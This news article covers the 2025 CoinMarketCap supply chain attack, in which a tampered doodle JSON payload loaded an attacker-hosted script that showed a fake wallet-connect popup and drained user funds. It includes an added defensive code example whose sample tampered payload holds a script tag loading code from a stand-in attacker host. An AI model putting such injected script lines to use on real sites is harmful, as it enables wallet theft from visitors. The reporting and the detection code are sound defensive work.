CoinMarketCap Supply Chain Attack Leaves Crypto Users Reeling After $43,000 Wallet Drain
<p data-start="264" data-end="392">A malicious script hidden in a homepage image triggered a wallet-draining popup that stole thousands from unsuspecting visitors.</p>
<p data-start="399" data-end="710">On the evening of June 20, 2025, visitors to CoinMarketCap weren’t expecting anything unusual. It looked like a typical day on the world’s most visited cryptocurrency pricing site. But what appeared to be a harmless homepage doodle ended up being the digital Trojan horse that siphoned crypto from user wallets.</p>
<p data-start="712" data-end="905">Within hours, a wave of complaints and concerns started trickling through social media and crypto forums. Popups asking users to connect their Web3 wallets? On CoinMarketCap? Something was off.</p>
<h2 data-start="907" data-end="941">A Wallet Popup No One Asked For</h2>
<p data-start="943" data-end="1042">Things started to go sideways when users began encountering strange Web3 wallet connection prompts.</p>
<p data-start="1044" data-end="1170">Most users thought it was a new feature or maybe an update. Instead, the moment they clicked &#8220;Connect,&#8221; their crypto was gone.</p>
<p data-start="1172" data-end="1187">Just like that.</p>
<p data-start="1189" data-end="1355">In a statement posted on X, CoinMarketCap confirmed that threat actors had slipped malicious JavaScript into their homepage through a seemingly innocent doodle image.</p>
<p data-start="1189" data-end="1355"><a href="https://www.theibulletin.com/wp-content/uploads/2025/06/coinmarketcap-website-homepage-screenshot.jpg"><img class="aligncenter size-full wp-image-57732" src="https://www.theibulletin.com/wp-content/uploads/2025/06/coinmarketcap-website-homepage-screenshot.jpg" alt="coinmarketcap website homepage screenshot" width="1101" height="818" /></a></p>
<h2 data-start="1357" data-end="1401">How a Doodle Image Became the Smoking Gun</h2>
<p data-start="1403" data-end="1441">So how did an image become a backdoor?</p>
<p data-start="1443" data-end="1631">Well, it wasn’t the image itself. It was the JSON payload linked to it. According to cybersecurity firm c/side, attackers had tampered with the API CoinMarketCap used to serve that doodle.</p>
<p data-start="1633" data-end="1771">Once that JSON was loaded, it quietly inserted a script tag referencing static.cdnkit[.]io—an external server controlled by attackers.</p>
<p data-start="1773" data-end="1807">And that’s where the damage began.</p>
<ul data-start="1809" data-end="2024">
<li data-start="1809" data-end="1847">
<p data-start="1811" data-end="1847">The script ran on the user’s browser</p>
</li>
<li data-start="1848" data-end="1917">
<p data-start="1850" data-end="1917">A fake Web3 wallet popup appeared using real CoinMarketCap branding</p>
</li>
<li data-start="1918" data-end="1978">
<p data-start="1920" data-end="1978">Unsuspecting users clicked “connect,” thinking it was safe</p>
</li>
<li data-start="1979" data-end="2024">
<p data-start="1981" data-end="2024">Their wallet contents were drained silently</p>
</li>
</ul>
<p data-start="2026" data-end="2212">This wasn’t a direct breach of CoinMarketCap’s servers. It was something trickier: a supply chain attack. One that worked by compromising a third-party component CoinMarketCap relied on.</p>
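<p>An added example, not CoinMarketCap's or c/side's code: one way to audit a JSON payload like the doodle response described above before it is rendered, rejecting script markup and URLs on hosts outside an allowlist. The hosts, field names and both sample payloads are constructed assumptions.</p>

```javascript
// Added example: audit a doodle-style JSON payload before it reaches the DOM.
// Hosts, field names and both payloads are constructed for illustration.
const ALLOWED_HOSTS = new Set(["cdn.site.example"]);

// Markup that has no place in a payload meant to describe an image.
const ACTIVE_CONTENT = [/<\s*script\b/i, /\son[a-z]+\s*=/i, /javascript:/i];
// Absolute and protocol-relative URLs; group 1 is the host.
const URL_RE = /(?:https?:)?\/\/([a-z0-9.-]+)/gi;

// Walk every string in the parsed JSON and collect reasons to reject it.
function auditPayload(value, path = "$", findings = []) {
  if (typeof value === "string") {
    if (ACTIVE_CONTENT.some((re) => re.test(value))) {
      findings.push({ path, reason: "active-content" });
    }
    for (const m of value.matchAll(URL_RE)) {
      const host = m[1].toLowerCase();
      if (!ALLOWED_HOSTS.has(host)) {
        findings.push({ path, reason: "unlisted-host", host });
      }
    }
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => auditPayload(v, `${path}[${i}]`, findings));
  } else if (value !== null && typeof value === "object") {
    for (const [key, v] of Object.entries(value)) {
      auditPayload(v, `${path}.${key}`, findings);
    }
  }
  return findings;
}

// Fail closed: unparsable JSON or any finding means the payload is not rendered.
function isSafeToRender(jsonText) {
  try {
    return auditPayload(JSON.parse(jsonText)).length === 0;
  } catch {
    return false;
  }
}

const CLEAN = JSON.stringify({
  name: "summer-doodle",
  frames: [{ src: "https://cdn.site.example/doodle/frame1.png" }],
});
const TAMPERED = JSON.stringify({
  name: "summer-doodle",
  frames: [{ src: "https://cdn.site.example/doodle/frame1.png" }],
  caption: '<script src="https://static.attacker.example/loader.js"></script>',
});

console.log(isSafeToRender(CLEAN), auditPayload(JSON.parse(TAMPERED)));
```

<p>A check like this complements, rather than replaces, a Content-Security-Policy that restricts script sources, since the policy is what stops a script the audit missed from loading.</p>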
<h2 data-start="2214" data-end="2272">Supply Chain Attacks: Silent, Slippery, and Devastating</h2>
<p data-start="2274" data-end="2393">Supply chain attacks are nasty because they don’t go after the big fish directly. Instead, they poison the fish’s food.</p>
<p data-start="2395" data-end="2521">That’s basically what happened here. CMC trusted an external source to display a fun little graphic. That trust was exploited.</p>
<p data-start="2523" data-end="2642">In their analysis, c/side wrote: “Such attacks are hard to detect because they exploit trusted elements of a platform.”</p>
<p data-start="2644" data-end="2813">They’re not wrong. From SolarWinds to 3CX, supply chain breaches have made headlines for exactly this reason—they sneak in through the back door everyone forgot to lock.</p>
<h2 data-start="2815" data-end="2850">A Glimpse Into the Drainer Panel</h2>
<p data-start="2852" data-end="2893">The attackers weren’t exactly shy either.</p>
<p data-start="2895" data-end="3074">More technical details started emerging after a threat actor named Rey posted a screenshot of the drainer control panel on Telegram. The panel confirmed some disturbing stats:</p>
<ul data-start="3076" data-end="3169">
<li data-start="3076" data-end="3103">
<p data-start="3078" data-end="3103">Total stolen: $43,266</p>
</li>
<li data-start="3104" data-end="3128">
<p data-start="3106" data-end="3128">Total victims: 110</p>
</li>
<li data-start="3129" data-end="3169">
<p data-start="3131" data-end="3169">Language used by attackers: French</p>
</li>
</ul>
<p data-start="3171" data-end="3225">Here&#8217;s a snapshot of what the attackers were tracking:</p>
<div class="_tableContainer_16hzy_1">
<div class="_tableWrapper_16hzy_14 group flex w-fit flex-col-reverse" tabindex="-1">
<table class="w-fit min-w-(--thread-content-width)" data-start="3227" data-end="3549">
<thead data-start="3227" data-end="3268">
<tr data-start="3227" data-end="3268">
<th data-start="3227" data-end="3253" data-col-size="sm">Metric</th>
<th data-start="3253" data-end="3268" data-col-size="sm">Value</th>
</tr>
</thead>
<tbody data-start="3311" data-end="3549">
<tr data-start="3311" data-end="3352">
<td data-start="3311" data-end="3337" data-col-size="sm">Total Wallets Affected</td>
<td data-start="3337" data-end="3352" data-col-size="sm">110</td>
</tr>
<tr data-start="3353" data-end="3394">
<td data-start="3353" data-end="3379" data-col-size="sm">Total Funds Drained</td>
<td data-start="3379" data-end="3394" data-col-size="sm">$43,266</td>
</tr>
<tr data-start="3395" data-end="3436">
<td data-start="3395" data-end="3421" data-col-size="sm">Channel Language</td>
<td data-start="3421" data-end="3436" data-col-size="sm">French</td>
</tr>
<tr data-start="3437" data-end="3485">
<td data-start="3437" data-end="3463" data-col-size="sm">Host Site</td>
<td data-start="3463" data-end="3485" data-col-size="sm">static.cdnkit[.]io</td>
</tr>
<tr data-start="3486" data-end="3549">
<td data-start="3486" data-end="3512" data-col-size="sm">Popup Spoof</td>
<td data-start="3512" data-end="3549" data-col-size="sm">CoinMarketCap Web3 Wallet Connect</td>
</tr>
</tbody>
</table>
</div>
</div>
<p data-start="3551" data-end="3731">While $43K might not sound like a fortune in crypto terms, that’s not the real point. The point is how it was done—stealthy, smart, and practically invisible until it was too late.</p>
<h2 data-start="3733" data-end="3787">The Bigger Picture: Wallet Drainers Are on the Rise</h2>
<p data-start="3789" data-end="3825">Unfortunately, this isn’t a one-off.</p>
<p data-start="3827" data-end="4067">Wallet drainers have been getting more creative by the month. Gone are the days of old-school phishing emails. Now, you’ll find them embedded in Twitter ads, disguised as browser extensions, or hiding in cloned versions of popular websites.</p>
<p data-start="4069" data-end="4231">By some estimates, wallet drainers alone siphoned nearly $500 million in 2024. That’s half a billion gone in less than a year, spread across 300,000+ victims.</p>
<p data-start="4233" data-end="4247">Scary numbers.</p>
<p data-start="4249" data-end="4376">Mozilla&#8217;s even rolled out new measures to spot these scripts in Firefox add-ons. That tells you how real the threat has become.</p>
<h2 data-start="4378" data-end="4437">CoinMarketCap Responds, Users Left Picking Up the Pieces</h2>
<p data-start="4439" data-end="4608">CoinMarketCap says the hole is patched. Their post on X was quick to reassure users: “We acted immediately… identified the root cause… CoinMarketCap is safe and secure.”</p>
<p data-start="4610" data-end="4655">But for the 110 victims, it’s little comfort.</p>
<p data-start="4657" data-end="4746">There’s no customer support line for stolen Ethereum. No chargeback button for lost NFTs.</p>
<p data-start="4748" data-end="4812">In crypto, self-custody means self-responsibility—and self-risk.</p>
<p data-start="4814" data-end="4952">One user wrote on Reddit, “I only had $300 in there, but it still hurts. I’ve been checking that site for years without a second thought.”</p>
<p data-start="4954" data-end="4995">That’s exactly what made the attack work.</p>
